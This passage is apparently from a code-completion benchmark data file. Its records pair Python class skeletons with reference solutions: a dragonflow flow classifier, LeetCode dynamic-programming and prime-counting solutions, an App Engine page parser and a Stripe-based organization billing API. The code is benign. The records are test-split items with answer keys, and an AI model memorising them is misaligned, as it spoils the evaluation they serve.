For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\n- def is_dispatch_local(self): Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\n- def validate(self): Make sure exactly one of {source_port, dest_port} is set", "prompted_full_text": "Implement the Python class `FlowClassifier` described below.\n\nClass description:\nImplement the FlowClassifier class.\n\nMethod signatures and docstrings:\n- def is_classification_local(self): Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\n- def is_dispatch_local(self): Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\n- def validate(self): Make sure exactly one of {source_port, dest_port} is set\n\n<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. 
The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "revision_id": "0f154d4f794b02ac5b7fd61a3417d89e7b10912d", "skeleton": "<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FlowClassifier:\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. 
The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n", "source": "the_stack_v2_python_sparse", "source_path": "dragonflow/db/models/sfc.py", "source_repo": "qianyuqiao/dragonflow", "split": "test", "star_events_count": 0} {"blob_id": "585e33f6e035ea3d15fdfe9a6e74caf5c2dfb9d1", "bodies": ["n = len(s)\ns_ = s[::-1]\ndp = [[0] * (n + 1) for _ in range(n + 1)]\nfor i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\nreturn n - dp[-1][-1]", "n = len(s)\ndp = [[0] * n for _ in range(n)]\nfor span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\nreturn dp[0][n - 1]"], "bodies_text": "<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000285", "length_bytes": 2224, "license_type": "no_license", "methods": [{"docstring": "思路:动态规划法 1. 
s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:", "name": "minInsertions1", "signature": "def minInsertions1(self, s: str) -> int"}, {"docstring": "思路:区间dp @param s: @return:", "name": "minInsertions2", "signature": "def minInsertions2(self, s: str) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002392", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minInsertions1(self, s: str) -> int: 思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\n- def minInsertions2(self, s: str) -> int: 思路:区间dp @param s: @return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minInsertions1(self, s: str) -> int: 思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\n- def minInsertions2(self, s: str) -> int: 思路:区间dp @param s: @return:\n\n<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "revision_id": "e43ee86c5a8cdb808da09b4b6138e10275abadb5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/动态规划法(dp)/1312. 
让字符串成为回文串的最少插入次数.py", "source_repo": "yiming1012/MyLeetCode", "split": "test", "star_events_count": 2} {"blob_id": "403b4b9ba23ba10354f7848c7a985f2d35c59b54", "bodies": ["selector = '#ae-appbar-version-id option[selected=\"selected\"]'\nversion_element, = self.doc.cssselect(selector)\nreturn version_element.text.strip()", "details = []\nselector = '#ae-instances-details-table tbody tr'\nfor element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\nreturn details"], "bodies_text": "<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "class_docstring": "An API for the contents of /instances as structured data.", "class_name": "Instances", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000286", "length_bytes": 15505, "license_type": "no_license", "methods": [{"docstring": "The app version that owns these instances.", "name": "version", "signature": "def version(self)"}, {"docstring": "Performance statistics specific to each instance. 
Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]", "name": "raw_detail_dicts", "signature": "def raw_detail_dicts(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005493", "prompt": "Implement the Python class `Instances` described below.\n\nClass description:\nAn API for the contents of /instances as structured data.\n\nMethod signatures and docstrings:\n- def version(self): The app version that owns these instances.\n- def raw_detail_dicts(self): Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]", "prompted_full_text": "Implement the Python class `Instances` described below.\n\nClass description:\nAn API for the contents of /instances as structured data.\n\nMethod signatures and docstrings:\n- def version(self): The app version that owns these instances.\n- def raw_detail_dicts(self): Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\n\n<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "revision_id": "c4ad2ad67b497ce411a9e5d6d6db407ee304491f", "skeleton": "<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... 
]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n", "source": "the_stack_v2_python_sparse", "source_path": "src/gae_dashboard/parsers.py", "source_repo": "summer-liu/analytics", "split": "test", "star_events_count": 1} {"blob_id": "2b05cca085cf68b03e50d64f62caa55a46390e11", "bodies": ["if n < 3:\n return 0\nprimes = [False] * n\ncount = n / 2\ni = 3\nwhile i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\nreturn count", "if n < 3:\n return 0\nif n == 3:\n return 1\nprimes = [2]\nfor i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\nreturn primes"], "bodies_text": "<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n 
is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000287", "length_bytes": 1571, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "countPrimes", "signature": "def countPrimes(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "allPrimes", "signature": "def allPrimes(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001623", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def countPrimes(self, n): :type n: int :rtype: int\n- def allPrimes(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def countPrimes(self, n): :type n: int :rtype: int\n- def allPrimes(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "revision_id": "33c623f226981942780751554f0593f2c71cf458", "skeleton": "<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n", "source": "the_stack_v2_python_sparse", "source_path": "math/leetcode_Count_Primes.py", "source_repo": "monkeylyf/interviewjam", "split": "test", "star_events_count": 59} {"blob_id": "e96945fababa77d483574550ab01855da9d66d98", "bodies": ["permission = AdministerOrganizationPermission(orgname)\nif permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not 
organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\nraise Unauthorized()", "permission = AdministerOrganizationPermission(orgname)\nif permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\nraise Unauthorized()", "cus = None\npermission = AdministerOrganizationPermission(orgname)\nif permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\nraise Unauthorized()"], "bodies_text": "<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = 
model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "class_docstring": "Resource for managing a org's subscription.", "class_name": "OrganizationPlan", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except 